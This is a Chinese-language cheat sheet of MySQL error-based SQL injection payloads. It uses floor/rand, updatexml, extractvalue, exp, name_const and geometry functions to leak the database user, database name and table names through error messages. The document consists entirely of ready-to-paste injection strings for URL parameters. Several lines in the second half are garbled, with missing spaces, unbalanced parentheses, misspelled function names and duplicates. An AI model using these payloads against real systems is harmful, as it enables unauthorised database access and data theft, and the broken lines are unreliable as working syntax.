报错注入语句

常用的三个报错注入语句:

floor报错

and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

union select count(*),1,concat((select table_name from information_schema.tables where table_schema = '数据库名' limit 1,1),floor(rand(0)*2))as a from information_schema.tables group by a --+

updatexml报错

and (updatexml(1,concat(0x7e,(select user()),0x7e),1))--+

and (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='数据库名'),0x7e),1)) --+

extractvalue报错

and (extractvalue(1,concat(0x7e,(select database()),0x7e)))--+

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='数据库名'))) --+

其他报错注入语句:

exp and exp(~(select * from (select user () ) a) );

join select * from(select * from mysql.user ajoin mysql.user b)c;

name_const and exists(selectfrom (selectfrom(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c);

GeometryCollection() and GeometryCollection(()select *from(select user () )a)b );

polygon () and polygon (()select * from(select user ())a)b );

multipoint () and multipoint (()select * from(select user() )a)b );

multlinestring () and multlinestring (()select * from(selectuser () )a)b );

multlinestring () and multpolygon (()select * from(selectuser () )a)b );

multlinestring () and multpolygon (()select * from(selectuser () )a)b );

linestring () and linestring (()select * from(select user() )a)b );